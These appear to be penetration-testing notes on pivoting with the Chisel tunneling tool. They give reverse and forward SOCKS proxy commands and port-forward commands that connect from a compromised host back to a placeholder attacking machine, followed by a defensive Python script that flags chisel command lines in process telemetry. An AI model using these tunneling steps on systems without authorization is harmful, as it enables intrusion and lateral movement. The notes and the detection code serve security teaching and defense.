Chisel (https://github.com/jpillora/chisel) is a tool for setting up a tunneled proxy or port forward without needing SSH.

https://github.com/jpillora/chisel/releases

To use chisel we need a copy of it on both the attacking machine and the relay. The tool offers two modes, client and server, each with its own help menu: chisel client|server --help

Reverse SOCKS Proxy

This connects back from a compromised server to a listener waiting on our attacking machine.

./chisel server -p LISTEN_PORT --reverse
./chisel client ATTACKING_IP:LISTEN_PORT R:socks &

Forward SOCKS Proxy

./chisel server -p LISTEN_PORT --socks5
./chisel client TARGET_IP:LISTEN_PORT PROXY_PORT:socks

<aside> 💡 When sending data through either of these proxies, we need to set the port in our proxychains configuration. As Chisel uses a SOCKS5 proxy, we also need to change the start of the line from socks4 to socks5.

</aside>

Remote Port Forward

A remote port forward is when we connect back from a compromised target to create the forward.

./chisel server -p LISTEN_PORT --reverse &

Here the LISTEN_PORT is the port that we started the chisel server on, and the LOCAL_PORT is the port we wish to open on our own attacking machine to link with the desired target port.

./chisel client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:TARGET_PORT &

Local Port Forward

As with SSH, a local port forward is where we connect from our own attacking machine to a chisel server listening on a compromised target.

./chisel client LISTEN_IP:LISTEN_PORT LOCAL_PORT:TARGET_IP:TARGET_PORT
./chisel server -p LISTEN_PORT
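
As an added example (not from these notes or from the chisel project), the Python below triages process command lines for the four invocations shown above and reports which host opens the listening port, which is where a defender reviewing process or socket telemetry should look. The function names, sample command lines and addresses are constructed for illustration, and only the remote forms used on this page are parsed.

```python
import shlex

def classify_remote(spec):
    """Classify one chisel client remote, limited to the forms on this page."""
    reverse = spec.startswith("R:")
    parts = (spec[2:] if reverse else spec).split(":")
    if parts[-1] == "socks":
        kind, target = "socks", None
        port = parts[-2] if len(parts) >= 2 else None  # None: no port on the command line
    elif len(parts) >= 3:
        kind, target = "port-forward", f"{parts[-2]}:{parts[-1]}"
        port = parts[-3]
    else:
        return None  # shorthand forms not shown on the page are ignored
    return {
        "kind": ("reverse-" if reverse else "forward-") + kind,
        # R: remotes listen on the chisel server host, plain remotes on the client host
        "listener_on": "server" if reverse else "client",
        "listen_port": port,
        "target": target,
    }

def triage(cmdline):
    """Return findings for one process command line, or [] if it is not chisel."""
    argv = shlex.split(cmdline)
    # Name match only: a renamed binary needs matching on argument shape instead.
    if len(argv) < 2 or "chisel" not in argv[0].rsplit("/", 1)[-1]:
        return []
    if argv[1] == "server":
        flags = [a for a in argv[2:] if a in ("--reverse", "--socks5")]
        return [{"kind": "server", "flags": flags}]
    if argv[1] == "client":
        # Client flags that take a value are not handled; args[0] is the server address.
        args = [a for a in argv[2:] if not a.startswith("-") and a != "&"]
        found = [classify_remote(s) for s in args[1:]]
        return [dict(f, server=args[0]) for f in found if f]
    return []

# Constructed sample command lines (documentation addresses, not from the page)
SAMPLES = [
    "./chisel server -p 8000 --reverse",
    "./chisel client 192.0.2.10:8000 R:socks",
    "./chisel client 192.0.2.10:8000 R:4444:10.0.0.5:3389",
    "/tmp/chisel client 198.51.100.7:8000 1080:socks",
    "/usr/bin/ssh -L 8080:10.0.0.5:80 user@host",
]
if __name__ == "__main__":
    for line in SAMPLES:
        print(line, "->", triage(line))
```
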